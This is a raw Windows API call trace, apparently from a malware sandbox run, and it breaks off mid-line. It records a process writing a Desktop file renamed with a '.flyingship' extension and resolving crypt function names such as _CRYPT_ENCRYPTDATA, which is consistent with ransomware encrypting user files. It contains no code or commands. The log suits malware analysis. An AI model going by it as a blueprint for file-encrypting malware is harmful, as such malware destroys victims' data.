CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\falabydgbqpgwn8jboac.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.987] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.987] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.987] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.987] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.987] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0158.987] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x2520, lpOverlapped=0x0) returned 1 [0161.035] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0161.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0161.036] TranslateMessage (lpMsg=0x87f36c) returned 0 [0161.036] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0161.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0161.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.036] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0161.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.037] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0161.037] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0161.037] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0161.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0161.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2520) returned 0x900440 [0161.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900440 | out: hHeap=0x8a0000) returned 1 [0161.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0161.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0161.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.038] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0161.038] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.038] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0161.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0161.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0161.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2520) returned 0x900440 [0161.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0161.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2768 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0161.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0161.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2520) returned 0x9e5190 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0161.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0161.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0161.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0161.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0161.040] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0161.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0161.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.040] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0161.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28c8 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0161.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0161.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.041] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0161.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0161.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.042] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0161.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0161.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0161.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0161.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0161.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.042] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0161.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0161.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0161.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0161.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0161.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0161.043] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0161.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0161.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.044] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0161.044] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0161.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0161.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0161.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0161.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0161.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.045] RtlAllocateHeap (HeapHandle=0x8a0000, 